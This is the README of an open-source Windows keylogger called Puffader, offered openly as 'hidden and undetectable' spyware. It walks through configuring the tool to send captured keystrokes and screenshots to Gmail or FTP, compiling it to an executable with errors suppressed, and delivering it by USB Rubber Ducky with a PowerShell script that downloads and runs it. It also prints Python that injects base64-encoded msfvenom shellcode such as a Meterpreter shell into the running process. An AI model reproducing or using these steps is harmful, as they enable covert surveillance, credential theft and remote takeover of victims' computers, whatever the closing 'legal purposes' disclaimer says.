Puffader is an open-source, hidden and undetectable keylogger for Windows, written in Python 2.7, which can also capture screenshots and mouse window clicks.
Puffader Requires:
Please refer to the wiki for more information on installing prerequisites.
The program can be downloaded via GitHub or git, e.g.:

```
git clone https://github.com/xp4xbox/Puffader
```
Currently Puffader has several features such as:
- Ability to send logs to any Gmail account.
- Ability to send logs via FTP
- Ability to capture screenshots
- Ability to store logs locally
- Ability to configure log size before sending
- Ability to send logs at timed intervals
- Ability to control how the backspace key is output.
- Ability to stop the program via ctrl-rshift-h.
- Ability to log special characters.
- Ability to embed an undetectable Meterpreter shell
- Optional persistence.
- Ability to capture window mouse clicks
- Checking for multiple instances
- USB Rubber Ducky payload
- And more...
- Open the file with IDLE or any other editor.
- Modify lines 22-45 to your personal preference, e.g.:
```python
strEmailAc = "[email protected]"
strEmailPass = "pass"
blnFTP = "False"
strFtpServer = ""
intFtpPort = 21
strFtpUser = ""
strFtpPass = ""
strFtpRemotePath = "/"
intCharPerSend = 1000
blnUseTime = "False"
intTimePerSend = 120
blnStoreLocal = "True"
strLogFile = "c:/temp/test.txt"
blnLogClick = "True"
blnBackRemove = "True"
blnScrShot = "True"
strScrDir = "c:/temp"
intScrTime = 120
```
NOTE: For `strScrDir`, be sure to leave out the last `/`.
If you plan to send messages via email, be sure to allow access for less secure apps in your Gmail account.
For more information please refer to the wiki.
- Add this code to Puffader.py: `sys.stderr = None` after the import statements to ensure no errors will show.
- Install Py2Exe.
- Run `python setup.py`
- Add this code to Puffader.py: `sys.stderr = None` after the import statements to ensure no errors will show.
- Install cx_Freeze via `pip install cx_freeze`.
- Run `python cx_freeze_setup.py build`.
Or refer to the wiki for more information.
Please refer to the wiki.
- Zip the compiled .exe's folder and upload it to any file sharing service.
- Edit payload.ps1, setting `$url` to be the direct link to the .zip, `$ZipName` to be the .zip name and `$strFileDir` to be the folder name inside the .zip file.
- Upload your payload.ps1 as well.
- Set `$url` in inject.txt to be the direct link for payload.ps1.
- Encode to inject.bin using my encoder or any other one.
TIP: Forking this project and using your personal repo for changes is an alternative way to host the files.
- Generate raw shellcode using msfvenom (eg. xr8\x02...).
- Encode the shellcode to base64 by using this.
- Move the code_injector module to the same directory as the program.
- Paste in this code after the function that prevents multiple instances, as here, setting `b64shellcode` to be your Base64-encoded shellcode.
```python
import code_injector, base64
# base64 shellcode
b64shellcode = ""
shellcode = base64.b64decode(b64shellcode)  # decode the base64 shellcode
pid = os.getpid()  # get current pid
code_injector.InjectShellCode(pid, shellcode)  # inject the shellcode into the program
```
- Build the program with Py2Exe using setup.py to compile it to a single .exe.
Check my other project PyEvade for more info on how this works.
If you need any help at all, feel free to post a "help" issue.
Contributing is encouraged and will help make a better program. Please refer to this before contributing.
This program must be used for legal purposes! I am not responsible for anything you do with it.